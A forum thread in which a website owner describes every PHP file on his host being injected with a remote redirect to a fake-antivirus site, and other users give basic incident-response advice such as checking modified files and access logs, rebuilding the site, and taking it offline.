PHP WEBSITE HIJACKED - Php code infected - HELP?

  • Thread starter Thread starter bigdawg723
  • Start date Start date
  • Tags Tags
    Code Php
AI Thread Summary
A website owner has reported a severe security breach, where every PHP file across multiple subdomains has been infected with a redirect script leading to a fake antivirus site. The infection affects all PHP files, including includes and root directories, indicating a widespread compromise. The owner suspects a vulnerability in their contact form, which may allow malicious code to enter the database, although no such entries have been found. Forum participants suggest immediate steps to diagnose and mitigate the issue, including searching for modified non-PHP files, identifying PHP files that reference the malicious site, and reviewing HTTP access logs to trace the attack's origin. The discussion highlights a potential connection to widespread issues on shared servers, particularly with GoDaddy, and emphasizes the importance of securing the site to prevent reinfection. Options discussed include either starting fresh by deleting everything or identifying and fixing the underlying vulnerability before restoring the site. The urgency of shutting down the site until the problem is resolved is also stressed.
bigdawg723
Messages
13
Reaction score
0
WEBSITE HIJACKED - Php code infected! - HELP!?

Hey All,

I've got a major *$%#@ problem. I'm freaking out here.

Check this out.

On my website, I have a way to allow visitors... to become distributors and sell my product as well. When they become a distributor, it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.

So... not only do I have my set of about 20 php pages and a solid 20+ php includes... I have to multiple those numbers by roughly... 50 distributors or more!

Here's my problem.

EVERY, not just a few... not just the pages (also includes, etc)... not just my root directory (also all subdomains)... EVERY PHP FILE has a new line of code at the very top that is a Script to a php file (oo.php) on another website that redirects every visitor to a new site and it's one of those 'fake antivirus' programs that are, essentially, a virus in their own.

When I first saw the redirect, I knew I was hijacked... but I assumed it was just 1 thing injected into my SQL Databases... or a simple code change or file somewhere... but it is THOUSANDS of files... and yes, I could go ahead and remove that snippet of code from each php file... but I still wouldn't know where it came from and I can only assume that the process which infected those pages still exists and would reinfect them all again the the very near future.

I'm begging you for help.

I know my contact form doesn't "close" the inputs or something... because it sends all contacts to the database table... and there's some major vulnerability there... but I couldn't find any entry in that database with any malicious code... perhaps it auto-deleted itself or something?

Please, I beg you, please lend a hand if you know anything about this.

Thank You,
Josh
 
Technology news on Phys.org


it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.
What is "it"? Is "it" from a trusted source? I am by no means an expert with these things, but that was the first thing that got my attention.
 


First up, do a search on google for text snippits of the php line that was added. If someone else has been fighting this battle already, they'll be a good candidate to help solve the problem.

Otherwise, not enough information. Something on your site that has write access to your PHP files is either currently compromised, or is still vulnerable and was/is being attacked. What OS are you on? Do you have script access? Cron access? Who's your ISP? Has anything else been modified?

Step 1, look for non-PHP files that have been modified recently. Hopefully, you can use that to detect whether or not there's some binary file or otherwise that's sitting on your system that will re-infect you. That's dangerous. If you have some that look suspicious, quarantine them. Make them non-executable and non-readable-- change the file name, whatever. There's a distinct possibility if you've got other programs that have installed themselves, that they'll try to re-install themselves, so check any config files you have. Heck, compare them to backups with your ISP.

Step 2, look for PHP files that have changed that reference the evil site in question. That is, it's possibly just a single PHP file that has write access to other PHP files, and if that PHP file is executed again, you're re-infected.

Step 3, look at your HTTP access log. See what was happening around the time that you were infected, and examine whatever relevant files were accessed during that time. Chances are, the attack started with a web request, and that's one way of trying to narrow down the point of attack. Otherwise, if the infection started in some OTHER way, talk to your ISP.

DaveE
 


I searched for that PHP thread... found it!

http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html

Apparently this happened to "hundreds" of GoDaddy shared servers... I assume thousands!

I've never seen this before... I have a few words for GoDaddy... but they don't care, maybe time for a host switch? They said it was due to outdated versions of WOrdPress... mine was fully up-to-date at the time of the attack. BS

Thanks for the quick replies though!

I love this forum - more helpful than any PHP-only forum I've found thus far.
 


You have really 2 ways to go with this:

1) Delete everything and start from new
2) Figure out how and where the vulnerability occurred, fix it, and then go about fixing the database issue.Good luck.
 


Please tell me that you have shut down your site until you fix the problem.
 

Thread 'Learning Assembly and computer architecture for x86'

Dear Peeps I have posted a few questions about programing on this sectio of the PF forum. I want to ask you veterans how you folks learn program in assembly and about computer architecture for the x86 family. In addition to finish learning C, I am also reading the book From bits to Gates to C and Beyond. In the book, it uses the mini LC3 assembly language. I also have books on assembly programming and computer architecture. The few famous ones i have are Computer Organization and...
View full post »

Thread 'Learning data structures and algorithms in different programming languages'

I have a quick questions. I am going through a book on C programming on my own. Afterwards, I plan to go through something call data structures and algorithms on my own also in C. I also need to learn C++, Matlab and for personal interest Haskell. For the two topic of data structures and algorithms, I understand there are standard ones across all programming languages. After learning it through C, what would be the biggest issue when trying to implement the same data...
View full post »

Similar threads

PHP How can I decode multiple layers of encoded php code?
Replies
9
Views
3K
PHP Would like some help understanding website management
Replies
12
Views
2K
Do you want to build a website?
Replies
15
Views
2K
PHP Learning Web Programming: MySQL & PHP for Complex Websites
Replies
16
Views
2K
PHP Advice on how to set column widths in php
Replies
7
Views
7K
PHP Limiting Output from Unmaintainable PHP Code
Replies
7
Views
2K
PHP Using PHP and cURL to submit POST requests to a website
Replies
7
Views
5K
PHP Help with php and this part of the code ?
Replies
1
Views
2K
PHP Preventing SQL Injection in PHP Forms
Replies
4
Views
6K
PHP PHP - Wrong datatype for second argument
Replies
2
Views
5K

Hot Threads

Recent Insights

Back
Top